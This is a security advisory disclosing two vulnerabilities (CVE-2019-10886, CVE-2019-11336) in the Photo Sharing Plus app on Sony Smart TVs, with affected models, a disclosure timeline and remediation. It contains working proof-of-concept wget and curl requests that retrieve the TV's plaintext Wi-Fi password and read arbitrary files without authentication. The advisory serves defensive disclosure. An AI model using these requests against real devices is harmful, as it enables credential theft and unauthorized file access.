Sony Smart TV Information Disclosure / File Read

`UNCLASSIFIED  
  
## ADVISORY INFORMATION  
  
TITLE: Multiple vulnerabilities in Sony Smart TVs  
ADVISORY URL:   
https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/  
DATE PUBLISHED: 23/04/2019  
AFFECTED VENDORS: Sony  
RELEASE MODE: Coordinated release  
CVE: CVE-2019-10886, CVE-2019-11336  
CVSSv3 for CVE-2019-10886: 6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)  
CVSSv3 for CVE-2019-11336: 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)  
  
  
  
## PRODUCT DESCRIPTION  
  
Sony Smart TVs are provided with applications - adding more functionalities  
for the customers - including the "Photo Sharing Plus" application.  
  
The "Photo Sharing Plus" application running inside the Smart TV contains  
several weaknesses. This application allows uploading pictures from Smartphone  
to the TVs, in order to display them on a large screen.  
When started, Photo Sharing Plus is turning the TV into a Wi-Fi access point  
and shows a Wi-Fi password allowing customers to connect and share their media  
content on the Sony Smart TVs.   
  
  
  
## DETAILS OF VULNERABILITIES  
  
xen1thLabs has found multiple vulnerabilities in Sony products in October 2018  
and xen1thLabs coordinated the disclosure of these vulnerabilities with Sony.  
Two vulnerabilities have been found in the Sony Smart TVs by xen1thLabs while  
auditing the security of Smart TVs.  
The first vulnerability allows an attacker - without authentication from the  
LAN/Wi-Fi - to retrieve the static Wi-Fi password created by the television  
when the Photo Sharing Plus application is started.  
The second vulnerability allows an attacker to read arbitrary files located in  
the TV without authentication including valuable files.   
  
The summary of the vulnerabilities is:  
  
- CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read  
Vulnerability  
- CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure  
Vulnerability  
  
The number of affected Sony models is very high and Sony has decided to remove  
this vulnerable application from all models  
(https://www.sony.com/electronics/support/televisions-projectors/articles/00204331).  
  
Sony provided a non-exhaustive list of affected TV models from 2015-2016.  
Recent models also are affected:  
  
- KDL-50W800C  
- KDL-50W805C  
- KDL-50W807C  
- KDL-50W809C  
- KDL-50W820C  
- KDL-55W800C  
- KDL-55W805C  
- KDL-65W850C  
- KDL-65W855C  
- KDL-65W857C  
- KDL-75W850C  
- KDL-75W855C  
- XBR-43X830C  
- XBR-49X800C  
- XBR-49X830C  
- XBR-49X835C  
- XBR-49X837C  
- XBR-49X839C  
- XBR-55X805C  
- XBR-55X807C  
- XBR-55X809C  
- XBR-55X810C  
- XBR-55X850C  
- XBR-55X855C  
- XBR-55X857C  
- XBR-65X800C  
- XBR-65X805C  
- XBR-65X807C  
- XBR-65X809C  
- XBR-65X810C  
- XBR-65X850C  
- XBR-65X855C  
- XBR-65X857C  
- XBR-75X850C  
- XBR-75X855C  
- XBR-55X900C  
- XBR-55X905C  
- XBR-55X907C  
- XBR-65X900C  
- XBR-65X905C  
- XBR-65X907C  
- XBR-65X930C  
- XBR-75X910C  
- XBR-75X940C  
- XBR-75X945C  
- XBR-43X800D  
- XBR-49X800D  
- XBR-49X835D  
- XBR-55X850D  
- XBR-55X855D  
- XBR-55X857D  
- XBR-65X850D  
- XBR-65X855D  
- XBR-65X857D  
- XBR-75X850D  
- XBR-75X855D  
- XBR-75X857D  
- XBR-85X850D  
- XBR-85X855D  
- XBR-85X857D  
- XBR-55X930D  
- XBR-65X930D  
- XBR-65X935D  
- XBR-65X937D  
- XBR-75X940D  
- XBR-100Z9D  
- XBR-49X700D  
- XBR-55X700D  
- XBR-65X750D  
- XBR-65Z9D  
- XBR-75Z9D  
- XBR-43X800E  
- XBR-49X800E  
- XBR-49X900E  
- XBR-55A1E  
- XBR-55X800E  
- XBR-55X806E  
- XBR-55X900E  
- XBR-55X930E  
- XBR-65A1E  
- XBR-65X850E  
- XBR-65X900E  
- XBR-65X930E  
- XBR-75X850E  
- XBR-75X900E  
- XBR-75X940E  
- XBR-77A1E  
  
  
  
### 1. CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure  
Vulnerability  
  
An unauthenticated remote attacker can retrieve the plaintext wireless password  
through the "Photo Sharing Plus" API.  
  
After starting the application, the following example retrieves the wireless  
password created from the TV (IP address of the TV is 192.168.1.102) over the  
LAN, without authentication:  
  
```  
root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/  
{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}  
````  
  
The password is 8362tbwX.  
  
By reading logs of the TV, we can confirm the password has been delivered over  
HTTP, without authentication. The logs contain password in plain-text:  
  
```  
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}  
````  
  
It is also important to note that the generated Wireless password by the TV is  
always the same. Even after a hard reboot and a disconnection from the power  
supply, the generated password will be always the same. This lack of randomness  
is also a security issue.  
  
  
  
### 2. CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read  
Vulnerability  
  
It is possible to retrieve internal TV files over HTTP without authentication.  
  
By default, images used by the Photo Sharing Plus application are stored inside  
`/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/`.  
The application starts an access point on the television and a HTTP daemon is  
listening to a TCP port on this WLAN.  
Furthermore, this daemon also listens on the LAN side of the television and it  
is possible to retrieve these images from the LAN an image using this URL:   
  
http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG  
  
Browsing the address http://[ip_tv]:10000/contentshare/image/ allows getting  
access to the root directory of the television running Android.  
  
By exploiting this vulnerability, /default.prop (containing Android properties)  
can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop:  
  
```  
root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop  
Trying 192.168.1.102...  
TCP_NODELAY set  
Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)  
> GET /contentshare/image/default.prop HTTP/1.1  
> Host: 192.168.1.102:10000   
> User-Agent: curl/7.58.0  
> Accept: /  
>  
< HTTP/1.1 200 OK  
< Connection: close  
< Content-Length: 591  
< Content-Type: application/octet-stream  
<  
#   
# ADDITIONAL_DEFAULT_PROPERTIES  
#  
ro.secure=1  
security.perf_harden=1  
ro.allow.mock.location=0  
ro.debuggable=0 ro.zygote=zygote32  
dalvik.vm.image-dex2oat-Xms=64m  
dalvik.vm.image-dex2oat-Xmx=64m  
dalvik.vm.dex2oat-Xms=64m dalvik.vm.dex2oat-Xmx=512m  
ro.dalvik.vm.native.bridge=0 debug.atrace.tags.enableflags=0   
#   
# BOOTIMAGE_BUILD_PROPERTIES   
#   
ro.bootimage.build.date=2016? 11? 14? ??? 15:34:56 JST ro.bootimage.build.date.utc=1479105296 ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys persist.sys.usb.config=none  
  
Closing connection 0   
````  
  
Logs in the TV confirm the /default.prop file has been delivered over HTTP:  
  
```  
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop  
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop  
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image  
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop  
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop  
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream  
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591  
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591  
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed.  
````  
  
  
## DISCLOSURE TIMELINE  
  
03/10/2018 - Vulnerabilities found  
10/10/2018 - Report to Sony - Report to Sony Bug bounty program  
through HackerOne  
12/10/2018 - Confirmation of the reception of the bug report  
15/10/2018 - xen1thLabs explains that the vulnerabilities are also exploitable  
over HbbTV (DVB-{S,T,C}) - through HackerOne  
29/10/2018 - Sony confirms the vulnerabilities  
09/11/2018 - Sony confirms the patches will be available in March 2019 and asks  
xen1thLabs to wait until April 2019  
29/11/2018 - xen1thLabs sent the slides prior to xen1thLabs's HiTB 2018 Dubai  
talk as agreed with Sony  
14/01/2019 - Updates requested from xen1thLabs  
15/01/2019 - Sony informs xen1thlabs that they are working on patches  
27/01/2019 - Updates requested from xen1thLabs  
07/03/2019 - Updates requested from xen1thLabs  
15/03/2019 - Sony informs xen1thLabs that the agreed date for disclosure is not  
possible because they don't know when they will be ready "maybe in a couple of  
months"  
17/03/2019 - Updates requested from Sony to understand and to publish a  
security advisory. xen1thLabs also requests CVEs officially  
20/03/2019 - xen1thLabs asks for an acceptable timeline  
21/03/2019 - xen1thLabs sent an email to [email protected] due to the lack of  
proper communication from Sony and informing Sony that in order to protect  
their customers xen1thLabs needs to publish a security advisory   
21/03/2019 - Automatic response from [email protected] is no more in use.   
22/03/2019 - Sony is working on the patches and confirms the 12th April  
26/03/2019 - xen1thLabs confirms the release date of the advisory and asks for  
CVEs  
01/04/2019 - Sony confirms the vulnerabilities affects some models and  
"Sony plans to terminate Photo Sharing Plus service for all of models,  
and that completion date is scheduled for April 12th, 2019."  
16/04/2019 - Sony only provides one CVE instead of two. Sony states  
"the wireless password recovery is within Sony's TV specification and is  
expected behavior and Sony will not be submitting for a CVE regarding this"  
17/04/2019 - xen1thLabs requests a CVE from MITRE  
23/04/2019 - Public disclosure  
  
  
  
## SOLUTION  
  
Apply patches provided by Sony  
  
  
  
## CREDITS  
  
xen1thLabs - Telecom Lab  
  
  
  
## REFERENCES  
  
https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/  
  
Firmware update to v6.5830 from 01-22-2019 (including security patches?)  
https://www.sony.com/electronics/support/downloads/00015771  
  
Firmware update to v6.5830 from 01-22-2019 (not including security patches)  
https://www.sony.com/electronics/support/downloads/00015770  
  
End of Photo Sharing Plus 11/22/2018  
https://www.sony.com/electronics/support/articles/00204331  
  
https://www.darkmatter.ae/xen1thlabs/  
sony-smart-tv-photo-sharing-plus-arbitrary-file-read-vulnerability-xl-19-002/  
  
https://www.darkmatter.ae/xen1thlabs/  
sony-smart-tv-photo-sharing-plus-information-disclosure-vulnerability-xl-19-003/  
  
  
  
## ABOUT xen1thLabs  
  
xen1thLabs conducts vulnerability research, which feeds in the testing and  
validation activities it conducts across software, hardware and  
telecommunication.  
xen1thLabs houses a team of world-class experts dedicated to providing  
high impact capabilities in cyber security.  
At xen1thLabs we are committed to uncovering new vulnerabilities that combat  
tomorrow's threats today.  
  
More information about xen1thLabs can be found at:  
https://www.darkmatter.ae/xen1thlabs/  
  
  
  
## WORKING AT xen1thLabs  
  
xen1thLabs is looking for several security researchers across multiple disciplines.  
Join a great team of likeminded specialists and enjoy all that UAE has to offer!  
  
If you are interested please visit:  
https://www.darkmatter.ae/xen1thlabs/  
  
  
  
`